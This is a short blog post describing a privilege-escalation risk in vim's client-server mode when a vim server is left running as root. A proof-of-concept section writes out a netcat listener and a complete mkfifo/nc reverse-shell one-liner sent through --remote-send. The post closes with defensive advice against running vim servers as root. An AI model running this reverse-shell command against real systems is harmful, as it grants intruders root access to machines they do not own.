VIM Privilege Escalation with Server Client Mode


Recently, I've developed this work flow which involves using the server client mode of vim. For further information about server client mode of vim, there're tons of articles about that.

The main problem is that, if I run vim server with non-root user, I cannot edit system files which belong to root. To solve this problem, I may have to run vim server using sudo.

The Issue

When I come to think about this, it poses security issues to your system. You may accidentally run a vim server with sudo and later close the terminal before quitting vim, so the vim server process is still running in the background, and it's run by root.

To make it worse, you can open as many vim server as possible. They just run in the background simultaneously.

Multiple vim server processes co-exist. In case you don't kill them all, they're like rogue processes that are dangerous.

If one of them is labeled with sudo. Then you can happily root this machine.

Proof of Concept - A Reverse Shell

Say you've compromised a machine, and you've found this vim server running under sudo.

The concept is really simple. Vim server client mode has this --remote-send feature to send key sequences to vim server. Like:

vim --servername SAMPLESRV --remote-send ":split filename"

And vim will open the file horizontal split.

Plus, vim can execute arbitrary bash commands by typing :!cmd in normal mode.

So, under the circumstances, you can just open up a listener on your attacker machine.

nc -lvnp 9999

Then, send a reverse shell command to the root-running vim server on the target machine.

vim --servername SAMPLESRV --remote-send ":! rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i | nc ip 9999 > /tmp/f"

Bang! You get a reverse shell with root access.

One Final Tip

I know maybe no one will run vim like this. But I myself find it really convenient to manage all need-editing files in one window so I don't have to look around for them. Normally I will send each file to my vim server with --remote-tab to open them in a new tab. It's pretty handy.

One final tip for myself, don't run vim server as root. Find other ways to deal with system file editing. And always be careful when using sudo.